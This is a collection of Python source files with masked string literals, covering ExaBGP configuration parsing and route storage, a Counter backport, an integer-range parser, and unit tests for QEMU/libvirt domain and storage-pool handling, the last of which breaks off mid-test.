<s> """<STR_LIT>""" <EOL> from string import ascii_letters <EOL> from string import digits <EOL> from exabgp . configuration . core . error import Error <EOL> class Section ( Error ) : <EOL> name = '<STR_LIT>' <EOL> known = dict ( ) <EOL> default = dict ( ) <EOL> action = { } <EOL> assign = { } <EOL> def __init__ ( self , tokerniser , scope , error , logger ) : <EOL> Error . __init__ ( self ) <EOL> self . tokeniser = tokerniser <EOL> self . scope = scope <EOL> self . error = error <EOL> self . logger = logger <EOL> self . _names = [ ] <EOL> def clear ( self ) : <EOL> raise RuntimeError ( '<STR_LIT>' % self . __class__ . __name__ ) <EOL> @ classmethod <EOL> def register ( cls , name , action ) : <EOL> def inner ( function ) : <EOL> if name in cls . known : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> cls . known [ name ] = function <EOL> cls . action [ name ] = action <EOL> return function <EOL> return inner <EOL> def check_name ( self , name ) : <EOL> if any ( False if c in ascii_letters + digits + '<STR_LIT>' else True for c in name ) : <EOL> self . throw ( '<STR_LIT>' % self . name ) <EOL> if name in self . _names : <EOL> self . throw ( '<STR_LIT>' % ( name , self . name ) ) <EOL> self . _names . append ( name ) <EOL> def pre ( self ) : <EOL> return True <EOL> def post ( self ) : <EOL> return True <EOL> def parse ( self , name , command ) : <EOL> if command not in self . known : <EOL> return self . error . set ( '<STR_LIT>' % ( command , '<STR_LIT:U+002CU+0020>' . join ( self . known ) ) ) <EOL> try : <EOL> if command in self . default : <EOL> insert = self . known [ command ] ( self . tokeniser . iterate , self . default [ command ] ) <EOL> else : <EOL> insert = self . known [ command ] ( self . tokeniser . iterate ) <EOL> action = self . action [ command ] <EOL> if action == '<STR_LIT>' : <EOL> self . scope . set ( command , insert ) <EOL> elif action == '<STR_LIT>' : <EOL> self . scope . 
extend ( name , insert ) <EOL> elif action == '<STR_LIT>' : <EOL> self . scope . append ( name , insert ) <EOL> elif action == '<STR_LIT>' : <EOL> self . scope . append ( command , insert ) <EOL> elif action == '<STR_LIT>' : <EOL> self . scope . attribute_add ( name , insert ) <EOL> elif action == '<STR_LIT>' : <EOL> self . scope . nlri_assign ( name , self . assign [ command ] , insert ) <EOL> elif action == '<STR_LIT>' : <EOL> for adding in insert : <EOL> self . scope . nlri_add ( name , command , adding ) <EOL> elif action == '<STR_LIT>' : <EOL> self . scope . nlri_nexthop ( name , insert ) <EOL> elif action == '<STR_LIT>' : <EOL> ip , attribute = insert <EOL> if ip : <EOL> self . scope . nlri_nexthop ( name , ip ) <EOL> if attribute : <EOL> self . scope . attribute_add ( name , attribute ) <EOL> elif action == '<STR_LIT>' : <EOL> pass <EOL> else : <EOL> raise RuntimeError ( '<STR_LIT>' % ( name , command ) ) <EOL> return True <EOL> except ValueError , exc : <EOL> return self . error . set ( str ( exc ) ) <EOL> return True </s>
<s> """<STR_LIT>""" <EOL> from _abcoll import * <EOL> class Counter ( dict ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , iterable = None , ** kwds ) : <EOL> '''<STR_LIT>''' <EOL> super ( Counter , self ) . __init__ ( ) <EOL> self . update ( iterable , ** kwds ) <EOL> def __missing__ ( self , key ) : <EOL> '<STR_LIT>' <EOL> return <NUM_LIT:0> <EOL> def most_common ( self , n = None ) : <EOL> '''<STR_LIT>''' <EOL> if n is None : <EOL> return sorted ( self . iteritems ( ) , key = _itemgetter ( <NUM_LIT:1> ) , reverse = True ) <EOL> return _heapq . nlargest ( n , self . iteritems ( ) , key = _itemgetter ( <NUM_LIT:1> ) ) <EOL> def elements ( self ) : <EOL> '''<STR_LIT>''' <EOL> return _chain . from_iterable ( _starmap ( _repeat , self . iteritems ( ) ) ) <EOL> @ classmethod <EOL> def fromkeys ( cls , iterable , v = None ) : <EOL> raise NotImplementedError ( <EOL> '<STR_LIT>' ) <EOL> def update ( self , iterable = None , ** kwds ) : <EOL> '''<STR_LIT>''' <EOL> if iterable is not None : <EOL> if isinstance ( iterable , Mapping ) : <EOL> if self : <EOL> self_get = self . get <EOL> for elem , count in iterable . iteritems ( ) : <EOL> self [ elem ] = self_get ( elem , <NUM_LIT:0> ) + count <EOL> else : <EOL> super ( Counter , self ) . update ( iterable ) <EOL> else : <EOL> self_get = self . get <EOL> for elem in iterable : <EOL> self [ elem ] = self_get ( elem , <NUM_LIT:0> ) + <NUM_LIT:1> <EOL> if kwds : <EOL> self . update ( kwds ) <EOL> def subtract ( self , iterable = None , ** kwds ) : <EOL> '''<STR_LIT>''' <EOL> if iterable is not None : <EOL> self_get = self . get <EOL> if isinstance ( iterable , Mapping ) : <EOL> for elem , count in iterable . items ( ) : <EOL> self [ elem ] = self_get ( elem , <NUM_LIT:0> ) - count <EOL> else : <EOL> for elem in iterable : <EOL> self [ elem ] = self_get ( elem , <NUM_LIT:0> ) - <NUM_LIT:1> <EOL> if kwds : <EOL> self . subtract ( kwds ) <EOL> def copy ( self ) : <EOL> '<STR_LIT>' <EOL> return self . 
__class__ ( self ) <EOL> def __reduce__ ( self ) : <EOL> return self . __class__ , ( dict ( self ) , ) <EOL> def __delitem__ ( self , elem ) : <EOL> '<STR_LIT>' <EOL> if elem in self : <EOL> super ( Counter , self ) . __delitem__ ( elem ) <EOL> def __repr__ ( self ) : <EOL> if not self : <EOL> return '<STR_LIT>' % self . __class__ . __name__ <EOL> items = '<STR_LIT:U+002CU+0020>' . join ( map ( '<STR_LIT>' . __mod__ , self . most_common ( ) ) ) <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , items ) <EOL> def __add__ ( self , other ) : <EOL> '''<STR_LIT>''' <EOL> if not isinstance ( other , Counter ) : <EOL> return NotImplemented <EOL> result = Counter ( ) <EOL> for elem , count in self . items ( ) : <EOL> newcount = count + other [ elem ] <EOL> if newcount > <NUM_LIT:0> : <EOL> result [ elem ] = newcount <EOL> for elem , count in other . items ( ) : <EOL> if elem not in self and count > <NUM_LIT:0> : <EOL> result [ elem ] = count <EOL> return result <EOL> def __sub__ ( self , other ) : <EOL> '''<STR_LIT>''' <EOL> if not isinstance ( other , Counter ) : <EOL> return NotImplemented <EOL> result = Counter ( ) <EOL> for elem , count in self . items ( ) : <EOL> newcount = count - other [ elem ] <EOL> if newcount > <NUM_LIT:0> : <EOL> result [ elem ] = newcount <EOL> for elem , count in other . items ( ) : <EOL> if elem not in self and count < <NUM_LIT:0> : <EOL> result [ elem ] = <NUM_LIT:0> - count <EOL> return result <EOL> def __or__ ( self , other ) : <EOL> '''<STR_LIT>''' <EOL> if not isinstance ( other , Counter ) : <EOL> return NotImplemented <EOL> result = Counter ( ) <EOL> for elem , count in self . items ( ) : <EOL> other_count = other [ elem ] <EOL> newcount = other_count if count < other_count else count <EOL> if newcount > <NUM_LIT:0> : <EOL> result [ elem ] = newcount <EOL> for elem , count in other . 
items ( ) : <EOL> if elem not in self and count > <NUM_LIT:0> : <EOL> result [ elem ] = count <EOL> return result <EOL> def __and__ ( self , other ) : <EOL> '''<STR_LIT>''' <EOL> if not isinstance ( other , Counter ) : <EOL> return NotImplemented <EOL> result = Counter ( ) <EOL> for elem , count in self . items ( ) : <EOL> other_count = other [ elem ] <EOL> newcount = count if count < other_count else other_count <EOL> if newcount > <NUM_LIT:0> : <EOL> result [ elem ] = newcount <EOL> return result </s>
<s> """<STR_LIT>""" <EOL> from exabgp . protocol . resource import BitResource <EOL> class Fragment ( BitResource ) : <EOL> NAME = '<STR_LIT>' <EOL> NOT = <NUM_LIT> <EOL> DONT = <NUM_LIT> <EOL> IS = <NUM_LIT> <EOL> FIRST = <NUM_LIT> <EOL> LAST = <NUM_LIT> <EOL> codes = dict ( ( k . lower ( ) . replace ( '<STR_LIT:_>' , '<STR_LIT:->' ) , v ) for ( k , v ) in { <EOL> '<STR_LIT>' : NOT , <EOL> '<STR_LIT>' : DONT , <EOL> '<STR_LIT>' : IS , <EOL> '<STR_LIT>' : FIRST , <EOL> '<STR_LIT>' : LAST , <EOL> } . items ( ) ) <EOL> names = dict ( [ ( r , l ) for ( l , r ) in codes . items ( ) ] ) </s>
<s> """<STR_LIT>""" <EOL> from exabgp . protocol . family import AFI <EOL> from exabgp . bgp . message import IN <EOL> from exabgp . bgp . message import OUT <EOL> from exabgp . bgp . message import Update <EOL> from exabgp . bgp . message . refresh import RouteRefresh <EOL> from exabgp . bgp . message . update . attribute import Attributes <EOL> class Store ( object ) : <EOL> def __init__ ( self , families ) : <EOL> self . _watchdog = { } <EOL> self . cache = False <EOL> self . families = families <EOL> self . clear ( ) <EOL> self . _cache_attribute = { } <EOL> self . _seen = { } <EOL> self . _modify_nlri = { } <EOL> self . _modify_sorted = { } <EOL> self . _changes = None <EOL> self . _enhanced_refresh_start = [ ] <EOL> self . _enhanced_refresh_delay = [ ] <EOL> def reset ( self ) : <EOL> self . _enhanced_refresh_start = [ ] <EOL> self . _enhanced_refresh_delay = [ ] <EOL> for update in self . updates ( True ) : <EOL> pass <EOL> def clear ( self ) : <EOL> self . _cache_attribute = { } <EOL> self . _seen = { } <EOL> self . _modify_nlri = { } <EOL> self . _modify_sorted = { } <EOL> self . _changes = None <EOL> self . reset ( ) <EOL> def sent_changes ( self , families = None ) : <EOL> requested_families = self . families if not families else set ( families ) . intersection ( self . families ) <EOL> for family in requested_families : <EOL> for change in self . _seen . get ( family , { } ) . values ( ) : <EOL> if change . nlri . action == OUT . ANNOUNCE : <EOL> yield change <EOL> def resend ( self , families , enhanced_refresh ) : <EOL> requested_families = self . families if not families else set ( families ) . intersection ( self . families ) <EOL> def _announced ( family ) : <EOL> for change in self . _seen . get ( family , { } ) . values ( ) : <EOL> if change . nlri . action == OUT . ANNOUNCE : <EOL> yield change <EOL> self . _seen [ family ] = { } <EOL> if enhanced_refresh : <EOL> for family in requested_families : <EOL> if family not in self . 
_enhanced_refresh_start : <EOL> self . _enhanced_refresh_start . append ( family ) <EOL> for change in _announced ( family ) : <EOL> self . insert_announced ( change , True ) <EOL> else : <EOL> for family in requested_families : <EOL> for change in _announced ( family ) : <EOL> self . insert_announced ( change , True ) <EOL> def queued_changes ( self ) : <EOL> for change in self . _modify_nlri . values ( ) : <EOL> yield change <EOL> def replace ( self , previous , changes ) : <EOL> for change in previous : <EOL> change . nlri . action = OUT . WITHDRAW <EOL> self . insert_announced ( change , True ) <EOL> for change in changes : <EOL> self . insert_announced ( change , True ) <EOL> def insert_announced_watchdog ( self , change ) : <EOL> watchdog = change . attributes . watchdog ( ) <EOL> withdraw = change . attributes . withdraw ( ) <EOL> if watchdog : <EOL> if withdraw : <EOL> self . _watchdog . setdefault ( watchdog , { } ) . setdefault ( '<STR_LIT:->' , { } ) [ change . index ( ) ] = change <EOL> return True <EOL> self . _watchdog . setdefault ( watchdog , { } ) . setdefault ( '<STR_LIT:+>' , { } ) [ change . index ( ) ] = change <EOL> self . insert_announced ( change ) <EOL> return True <EOL> def announce_watchdog ( self , watchdog ) : <EOL> if watchdog in self . _watchdog : <EOL> for change in self . _watchdog [ watchdog ] . get ( '<STR_LIT:->' , { } ) . values ( ) : <EOL> change . nlri . action = OUT . ANNOUNCE <EOL> self . insert_announced ( change ) <EOL> self . _watchdog [ watchdog ] . setdefault ( '<STR_LIT:+>' , { } ) [ change . index ( ) ] = change <EOL> self . _watchdog [ watchdog ] [ '<STR_LIT:->' ] . pop ( change . index ( ) ) <EOL> def withdraw_watchdog ( self , watchdog ) : <EOL> if watchdog in self . _watchdog : <EOL> for change in self . _watchdog [ watchdog ] . get ( '<STR_LIT:+>' , { } ) . values ( ) : <EOL> change . nlri . action = OUT . WITHDRAW <EOL> self . insert_announced ( change ) <EOL> self . _watchdog [ watchdog ] . 
setdefault ( '<STR_LIT:->' , { } ) [ change . index ( ) ] = change <EOL> self . _watchdog [ watchdog ] [ '<STR_LIT:+>' ] . pop ( change . index ( ) ) <EOL> def insert_received ( self , change ) : <EOL> if not self . cache : <EOL> return <EOL> elif change . nlri . action == IN . ANNOUNCED : <EOL> self . _seen [ change . index ( ) ] = change <EOL> else : <EOL> self . _seen . pop ( change . index ( ) , None ) <EOL> def insert_announced ( self , change , force = False ) : <EOL> if not force and self . _enhanced_refresh_start : <EOL> self . _enhanced_refresh_delay . append ( change ) <EOL> return <EOL> change_nlri_index = change . index ( ) <EOL> change_attr_index = change . attributes . index ( ) <EOL> dict_sorted = self . _modify_sorted <EOL> dict_nlri = self . _modify_nlri <EOL> dict_attr = self . _cache_attribute <EOL> if change_nlri_index in dict_nlri : <EOL> old_attr_index = dict_nlri [ change_nlri_index ] . attributes . index ( ) <EOL> old_change = dict_nlri . pop ( change_nlri_index ) <EOL> del dict_sorted [ old_attr_index ] [ change_nlri_index ] <EOL> if not dict_sorted [ old_attr_index ] : <EOL> del dict_sorted [ old_attr_index ] <EOL> if old_change . nlri . action == OUT . ANNOUNCE and change . nlri . action == OUT . WITHDRAW : <EOL> if self . cache and change_nlri_index not in self . _seen . get ( change . nlri . family ( ) , { } ) : <EOL> return <EOL> dict_sorted . setdefault ( change_attr_index , { } ) [ change_nlri_index ] = change <EOL> dict_nlri [ change_nlri_index ] = change <EOL> if change_attr_index not in dict_attr : <EOL> dict_attr [ change_attr_index ] = change <EOL> def updates ( self , grouped ) : <EOL> if self . _changes : <EOL> dict_nlri = self . _modify_nlri <EOL> for family in self . _seen : <EOL> for change in self . _seen [ family ] . itervalues ( ) : <EOL> if change . index ( ) not in self . _modify_nlri : <EOL> change . nlri . action = OUT . WITHDRAW <EOL> self . insert_announced ( change , True ) <EOL> for new in self . 
_changes : <EOL> self . insert_announced ( new , True ) <EOL> self . _changes = None <EOL> rr_announced = [ ] <EOL> for afi , safi in self . _enhanced_refresh_start : <EOL> rr_announced . append ( ( afi , safi ) ) <EOL> yield Update ( RouteRefresh ( afi , safi , RouteRefresh . start ) , Attributes ( ) ) <EOL> dict_sorted = self . _modify_sorted <EOL> dict_nlri = self . _modify_nlri <EOL> dict_attr = self . _cache_attribute <EOL> for attr_index , full_dict_change in dict_sorted . items ( ) : <EOL> if self . cache : <EOL> dict_change = { } <EOL> for nlri_index , change in full_dict_change . iteritems ( ) : <EOL> family = change . nlri . family ( ) <EOL> announced = self . _seen . get ( family , { } ) <EOL> if change . nlri . action == OUT . ANNOUNCE : <EOL> if nlri_index in announced : <EOL> old_change = announced [ nlri_index ] <EOL> if old_change . attributes . index ( ) == change . attributes . index ( ) and old_change . nlri . nexthop . index ( ) == change . nlri . nexthop . index ( ) : <EOL> continue <EOL> elif change . nlri . action == OUT . WITHDRAW : <EOL> if nlri_index not in announced : <EOL> if dict_nlri [ nlri_index ] . nlri . action == OUT . ANNOUNCE : <EOL> continue <EOL> dict_change [ nlri_index ] = change <EOL> else : <EOL> dict_change = full_dict_change <EOL> if not dict_change : <EOL> continue <EOL> attributes = dict_attr [ attr_index ] . attributes <EOL> changed = list ( dict_change . itervalues ( ) ) <EOL> if grouped : <EOL> updates = [ ] <EOL> nlris = [ ] <EOL> for change in dict_change . values ( ) : <EOL> if change . nlri . afi == AFI . ipv4 : <EOL> nlris . append ( change . nlri ) <EOL> continue <EOL> updates . append ( Update ( [ change . nlri ] , attributes ) ) <EOL> if nlris : <EOL> updates . append ( Update ( nlris , attributes ) ) <EOL> nlris = [ ] <EOL> for change in changed : <EOL> nlri_index = change . 
index ( ) <EOL> del dict_sorted [ attr_index ] [ nlri_index ] <EOL> del dict_nlri [ nlri_index ] <EOL> for update in updates : <EOL> yield update <EOL> else : <EOL> updates = [ ] <EOL> for change in changed : <EOL> updates . append ( Update ( [ change . nlri , ] , attributes ) ) <EOL> nlri_index = change . index ( ) <EOL> del dict_sorted [ attr_index ] [ nlri_index ] <EOL> del dict_nlri [ nlri_index ] <EOL> for update in updates : <EOL> yield update <EOL> if self . cache : <EOL> announced = self . _seen <EOL> for change in changed : <EOL> if change . nlri . action == OUT . ANNOUNCE : <EOL> announced . setdefault ( change . nlri . family ( ) , { } ) [ change . index ( ) ] = change <EOL> else : <EOL> family = change . nlri . family ( ) <EOL> if family in announced : <EOL> announced [ family ] . pop ( change . index ( ) , None ) <EOL> if rr_announced : <EOL> for afi , safi in rr_announced : <EOL> self . _enhanced_refresh_start . remove ( ( afi , safi ) ) <EOL> yield Update ( RouteRefresh ( afi , safi , RouteRefresh . end ) , Attributes ( ) ) <EOL> for change in self . _enhanced_refresh_delay : <EOL> self . insert_announced ( change , True ) <EOL> self . enhanced_refresh_delay = [ ] <EOL> for update in self . updates ( grouped ) : <EOL> yield update </s>
<s> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> import re <EOL> def unpack_integer_range ( integerrange ) : <EOL> """<STR_LIT>""" <EOL> integers = [ ] <EOL> valid_chars = re . compile ( "<STR_LIT>" ) <EOL> if re . match ( valid_chars , integerrange ) is None : <EOL> assert False , "<STR_LIT>" "<STR_LIT>" % integerrange <EOL> integerrange . replace ( "<STR_LIT:U+0020>" , "<STR_LIT>" ) <EOL> rangeparts = integerrange . split ( '<STR_LIT:U+002C>' ) <EOL> for rangepart in rangeparts : <EOL> rangemaxmin = rangepart . split ( '<STR_LIT:->' ) <EOL> if len ( rangemaxmin ) == <NUM_LIT:1> : <EOL> try : <EOL> integers . extend ( [ int ( rangemaxmin [ <NUM_LIT:0> ] ) ] ) <EOL> except ValueError : <EOL> assert False , "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" % integerrange <EOL> elif len ( rangemaxmin ) == <NUM_LIT:2> : <EOL> try : <EOL> rangemin = int ( rangemaxmin [ <NUM_LIT:0> ] ) <EOL> rangemax = int ( rangemaxmin [ <NUM_LIT:1> ] ) + <NUM_LIT:1> <EOL> except ValueError : <EOL> assert False , "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" % integerrange <EOL> if rangemin >= rangemax : <EOL> assert False , "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" % integerrange <EOL> integers . extend ( range ( rangemin , rangemax ) ) <EOL> else : <EOL> assert False , "<STR_LIT>" "<STR_LIT>" % integerrange <EOL> return sorted ( integers ) </s>
<s> import mock <EOL> import libvirt <EOL> import difflib <EOL> import unittest <EOL> from see . context . resources import qemu <EOL> def compare ( text1 , text2 ) : <EOL> """<STR_LIT>""" <EOL> diff = difflib . ndiff ( str ( text1 ) . splitlines ( True ) , str ( text2 ) . splitlines ( True ) ) <EOL> return '<STR_LIT:\n>' + '<STR_LIT:\n>' . join ( diff ) <EOL> class DomainXMLTest ( unittest . TestCase ) : <EOL> def test_domain_xml ( self ) : <EOL> """<STR_LIT>""" <EOL> config = """<STR_LIT>""" <EOL> expected = """<STR_LIT>""" + """<STR_LIT>""" <EOL> results = qemu . domain_xml ( '<STR_LIT:foo>' , config , '<STR_LIT>' ) <EOL> self . assertEqual ( results , expected , compare ( results , expected ) ) <EOL> def test_domain_xml_modifies ( self ) : <EOL> """<STR_LIT>""" <EOL> config = """<STR_LIT>""" + """<STR_LIT>""" <EOL> expected = """<STR_LIT>""" + """<STR_LIT>""" <EOL> results = qemu . domain_xml ( '<STR_LIT:foo>' , config , '<STR_LIT>' ) <EOL> self . assertEqual ( results , expected , compare ( results , expected ) ) <EOL> def test_domain_xml_network ( self ) : <EOL> """<STR_LIT>""" <EOL> config = """<STR_LIT>""" <EOL> expected = """<STR_LIT>""" + """<STR_LIT>""" + """<STR_LIT>""" <EOL> results = qemu . domain_xml ( '<STR_LIT:foo>' , config , '<STR_LIT>' , network_name = '<STR_LIT:foo>' ) <EOL> self . assertEqual ( results , expected , compare ( results , expected ) ) <EOL> def test_domain_xml_network_modifies ( self ) : <EOL> """<STR_LIT>""" <EOL> config = """<STR_LIT>""" + """<STR_LIT>""" <EOL> expected = """<STR_LIT>""" + """<STR_LIT>""" + """<STR_LIT>""" <EOL> results = qemu . domain_xml ( '<STR_LIT:foo>' , config , '<STR_LIT>' , network_name = '<STR_LIT:foo>' ) <EOL> self . assertEqual ( results , expected , compare ( results , expected ) ) <EOL> class DiskXMLTest ( unittest . 
TestCase ) : <EOL> def test_disk_xml ( self ) : <EOL> """<STR_LIT>""" <EOL> pool_config = """<STR_LIT>""" <EOL> disk_config = """<STR_LIT>""" <EOL> expected = """<STR_LIT>""" <EOL> results = qemu . disk_xml ( '<STR_LIT:foo>' , pool_config , disk_config , False ) <EOL> self . assertEqual ( results , expected , compare ( results , expected ) ) <EOL> def test_disk_xml_modifies ( self ) : <EOL> """<STR_LIT>""" <EOL> pool_config = """<STR_LIT>""" <EOL> disk_config = """<STR_LIT>""" + """<STR_LIT>""" <EOL> expected = """<STR_LIT>""" <EOL> results = qemu . disk_xml ( '<STR_LIT:foo>' , pool_config , disk_config , False ) <EOL> self . assertEqual ( results , expected , compare ( results , expected ) ) <EOL> def test_disk_cow ( self ) : <EOL> """<STR_LIT>""" <EOL> pool_config = """<STR_LIT>""" <EOL> disk_config = """<STR_LIT>""" <EOL> expected = """<STR_LIT>""" + """<STR_LIT>""" + """<STR_LIT>""" + """<STR_LIT>""" + """<STR_LIT>""" <EOL> results = qemu . disk_xml ( '<STR_LIT:foo>' , pool_config , disk_config , True ) <EOL> results = results . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) . replace ( '<STR_LIT:\t>' , '<STR_LIT>' ) . replace ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) <EOL> self . assertEqual ( results , expected , compare ( results , expected ) ) <EOL> class DomainCreateTest ( unittest . TestCase ) : <EOL> def test_create ( self ) : <EOL> """<STR_LIT>""" <EOL> xml = """<STR_LIT>""" <EOL> expected = """<STR_LIT>""" + """<STR_LIT>""" <EOL> hypervisor = mock . Mock ( ) <EOL> hypervisor . listNetworks . return_value = [ ] <EOL> with mock . patch ( '<STR_LIT>' , mock . mock_open ( read_data = xml ) , create = True ) : <EOL> qemu . domain_create ( hypervisor , '<STR_LIT:foo>' , { '<STR_LIT>' : '<STR_LIT>' } , '<STR_LIT>' ) <EOL> results = hypervisor . defineXML . call_args_list [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> self . 
assertEqual ( results , expected , compare ( results , expected ) ) <EOL> def test_create_network ( self ) : <EOL> """<STR_LIT>""" <EOL> xml = """<STR_LIT>""" <EOL> expected = """<STR_LIT>""" + """<STR_LIT>""" + """<STR_LIT>""" <EOL> hypervisor = mock . Mock ( ) <EOL> hypervisor . listNetworks . return_value = [ ] <EOL> with mock . patch ( '<STR_LIT>' , mock . mock_open ( read_data = xml ) , create = True ) : <EOL> qemu . domain_create ( hypervisor , '<STR_LIT:foo>' , { '<STR_LIT>' : '<STR_LIT>' } , '<STR_LIT>' , network_name = '<STR_LIT:foo>' ) <EOL> results = hypervisor . defineXML . call_args_list [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> self . assertEqual ( results , expected , compare ( results , expected ) ) <EOL> class DomainDeleteTest ( unittest . TestCase ) : <EOL> def test_delete_destroy ( self ) : <EOL> """<STR_LIT>""" <EOL> domain = mock . Mock ( ) <EOL> logger = mock . Mock ( ) <EOL> domain . isActive . return_value = True <EOL> qemu . domain_delete ( domain , logger ) <EOL> self . assertTrue ( domain . destroy . called ) <EOL> def test_delete_destroy_error ( self ) : <EOL> """<STR_LIT>""" <EOL> domain = mock . Mock ( ) <EOL> logger = mock . Mock ( ) <EOL> domain . isActive . return_value = True <EOL> domain . destroy . side_effect = libvirt . libvirtError ( "<STR_LIT>" ) <EOL> qemu . domain_delete ( domain , logger ) <EOL> self . assertTrue ( domain . undefineFlags . called ) <EOL> def test_delete_undefine ( self ) : <EOL> """<STR_LIT>""" <EOL> domain = mock . Mock ( ) <EOL> logger = mock . Mock ( ) <EOL> domain . isActive . return_value = False <EOL> qemu . domain_delete ( domain , logger ) <EOL> self . assertTrue ( domain . undefineFlags . called ) <EOL> def test_delete_undefine_snapshots ( self ) : <EOL> """<STR_LIT>""" <EOL> domain = mock . Mock ( ) <EOL> logger = mock . Mock ( ) <EOL> domain . isActive . return_value = False <EOL> qemu . domain_delete ( domain , logger ) <EOL> domain . undefineFlags . assert_called_with ( libvirt . 
VIR_DOMAIN_UNDEFINE_SNAPSHOTS_METADATA ) <EOL> class PoolCreateTest ( unittest . TestCase ) : <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_create ( self , exists_mock , makedirs ) : <EOL> """<STR_LIT>""" <EOL> expected = """<STR_LIT>""" + """<STR_LIT>""" <EOL> hypervisor = mock . Mock ( ) <EOL> exists_mock . return_value = False <EOL> qemu . pool_create ( hypervisor , '<STR_LIT:foo>' , '<STR_LIT>' ) <EOL> results = hypervisor . storagePoolCreateXML . call_args_list [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> results = results . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) . replace ( '<STR_LIT:\t>' , '<STR_LIT>' ) . replace ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) <EOL> makedirs . assert_called_with ( '<STR_LIT>' ) <EOL> self . assertEqual ( results , expected , compare ( results , expected ) ) <EOL> class PoolDeleteTest ( unittest . TestCase ) : <EOL> def test_delete_destroy ( self ) : <EOL> """<STR_LIT>""" <EOL> pool = mock . MagicMock ( ) <EOL> logger = mock . Mock ( ) <EOL> pool . XMLDesc . return_value = """<STR_LIT>""" <EOL> qemu . pool_delete ( pool , logger ) <EOL> self . assertTrue ( pool . destroy . called ) <EOL> def test_volume_deletion ( self ) : <EOL> """<STR_LIT>""" <EOL> pool = mock . MagicMock ( ) <EOL> logger = mock . Mock ( ) <EOL> volumes = { '<STR_LIT:foo>' : mock . Mock ( ) , '<STR_LIT:bar>' : mock . Mock ( ) , '<STR_LIT>' : mock . Mock ( ) } <EOL> pool . XMLDesc . return_value = """<STR_LIT>""" <EOL> pool . listVolumes . return_value = ( '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT>' ) <EOL> pool . storageVolLookupByName . side_effect = lambda n : volumes [ n ] <EOL> qemu . pool_delete ( pool , logger ) <EOL> volumes [ '<STR_LIT:foo>' ] . delete . assert_called_with ( <NUM_LIT:0> ) <EOL> volumes [ '<STR_LIT:bar>' ] . delete . assert_called_with ( <NUM_LIT:0> ) <EOL> volumes [ '<STR_LIT>' ] . delete . 
assert_called_with ( <NUM_LIT:0> ) <EOL> def test_volume_deletion_error ( self ) : <EOL> """<STR_LIT>""" <EOL> pool = mock . MagicMock ( ) <EOL> logger = mock . Mock ( ) <EOL> volumes = { '<STR_LIT:foo>' : mock . Mock ( ) , '<STR_LIT:bar>' : mock . Mock ( ) , '<STR_LIT>' : mock . Mock ( ) } <EOL> pool . XMLDesc . return_value = """<STR_LIT>""" <EOL> pool . listVolumes . return_value = ( '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT>' ) <EOL> pool . storageVolLookupByName . side_effect = lambda n : volumes [ n ] <EOL> volumes [ '<STR_LIT:foo>' ] . delete . side_effect = libvirt . libvirtError ( '<STR_LIT>' ) <EOL> qemu . pool_delete ( pool , logger ) <EOL> volumes [ '<STR_LIT:foo>' ] . delete . assert_called_with ( <NUM_LIT:0> ) <EOL> volumes [ '<STR_LIT:bar>' ] . delete . assert_called_with ( <NUM_LIT:0> ) <EOL> volumes [ '<STR_LIT>' ] . delete . assert_called_with ( <NUM_LIT:0> ) <EOL> self . assertTrue ( pool . destroy . called ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_delete_pool_folder ( self , os_mock , rm_mock ) : <EOL> """<STR_LIT>""" <EOL> pool = mock . MagicMock ( ) <EOL> logger = mock . Mock ( ) <EOL> os_mock . return_value = True <EOL> pool . XMLDesc . return_value = """<STR_LIT>""" <EOL> qemu . pool_delete ( pool , logger ) <EOL> rm_mock . assert_called_with ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_delete_pool_folder_error ( self , os_mock , rm_mock ) : <EOL> """<STR_LIT>""" <EOL> pool = mock . MagicMock ( ) <EOL> logger = mock . Mock ( ) <EOL> os_mock . return_value = True <EOL> pool . XMLDesc . return_value = """<STR_LIT>""" <EOL> pool . destroy . side_effect = libvirt . libvirtError ( '<STR_LIT>' ) <EOL> qemu . pool_delete ( pool , logger ) <EOL> rm_mock . assert_called_with ( '<STR_LIT>' ) <EOL> class DiskCloneTest ( unittest . TestCase ) : <EOL> def test_clone ( self ) : <EOL> """<STR_LIT>""" <EOL> pool = mock . 
Mock ( ) <EOL> volume = mock . Mock ( ) <EOL> hypervisor = mock . Mock ( ) <EOL> hypervisor . storageVolLookupByPath . return_value = volume <EOL> pool . XMLDesc . return_value = """<STR_LIT>""" <EOL> volume . XMLDesc . return_value = """<STR_LIT>""" + """<STR_LIT>""" <EOL> expected = """<STR_LIT>""" + """<STR_LIT>""" + """<STR_LIT>""" + """<STR_LIT>""" + """<STR_LIT>""" <EOL> qemu . disk_clone ( hypervisor , '<STR_LIT:foo>' , pool , { '<STR_LIT:image>' : '<STR_LIT>' , '<STR_LIT>' : { } } ) <EOL> results = pool . createXMLFrom . call_args_list [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> results = results . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) . replace ( '<STR_LIT:\t>' , '<STR_LIT>' ) . replace ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) <EOL> self . assertEqual ( results , expected , compare ( results , expected ) ) <EOL> def test_clone_cow ( self ) : <EOL> """<STR_LIT>""" <EOL> pool = mock . Mock ( ) <EOL> volume = mock . Mock ( ) <EOL> hypervisor = mock . Mock ( ) <EOL> hypervisor . storageVolLookupByPath . return_value = volume <EOL> pool . XMLDesc . return_value = 